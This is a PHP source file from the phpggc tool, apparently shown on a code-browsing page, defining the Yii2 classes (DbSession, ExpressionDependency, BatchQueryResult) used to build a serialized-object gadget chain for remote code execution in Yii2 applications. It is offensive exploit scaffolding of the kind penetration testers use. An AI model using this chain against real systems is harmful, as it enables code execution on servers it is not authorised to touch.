Codebase list phpggc / 16937d25-5ddb-465d-9a4f-b825f2744729/upstream/0.20221129 gadgetchains / Yii2 / RCE / 2 / gadgets.php
16937d25-5ddb-465d-9a4f-b825f2744729/upstream/0.20221129

Tree @16937d25-5ddb-465d-9a4f-b825f2744729/upstream/0.20221129 (Download .tar.gz)

gadgets.php @16937d25-5ddb-465d-9a4f-b825f2744729/upstream/0.20221129raw · history · blame

<?php
namespace yii\web
{
    class DbSession
    {
        public $writeCallback;

        function __construct($writeCallback) {
            $this->writeCallback = $writeCallback;
        }
    }
}

namespace yii\caching
{
    class ExpressionDependency
    {
        public $expression;

        function __construct($expression) {
            $this->expression = $expression;
        }
    }
}

namespace yii\db {
    class BatchQueryResult {
        private $_dataReader;

        function __construct($dataReader) {
            $this->_dataReader = $dataReader;
        }
    }
}

?>